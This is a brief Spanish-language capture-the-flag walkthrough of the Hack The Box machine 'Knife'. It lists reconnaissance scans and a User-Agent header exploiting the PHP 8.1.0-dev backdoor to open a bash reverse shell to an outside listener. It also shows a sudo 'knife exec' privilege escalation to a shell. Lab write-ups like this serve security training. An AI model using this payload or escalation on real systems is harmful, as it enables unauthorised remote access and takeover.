nmap -A -p- -oA knife 10.129.183.92 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210714073313.png

nmap -sC -sV -O -p- -oA knife 10.129.183.92

nmap -sU -O -p- -oA knife-udp 10.129.183.92

nikto -h 10.129.183.92:80

Pasted image 20210714080049.png

gobuster dir -k -u http://10.129.183.92/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que esta pagina esta creada con php 8.1.0

Pasted image 20210714074616.png

Usamos burpsuite y usamos el foxyproxy. Al tratar de meterse a 10.129.183.92. Agregamos lo siguiente: User-Agent: zerodiumsystem("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.94/5555 0>&1'");

Pasted image 20210714075239.png

nc -lvnp 5555

Pasted image 20210714075438.png

sudo knife exec -E "system('/bin/sh -i')"

Pasted image 20210714075640.png

boxes

copyright©2022 Cu3rv0x all rights reserved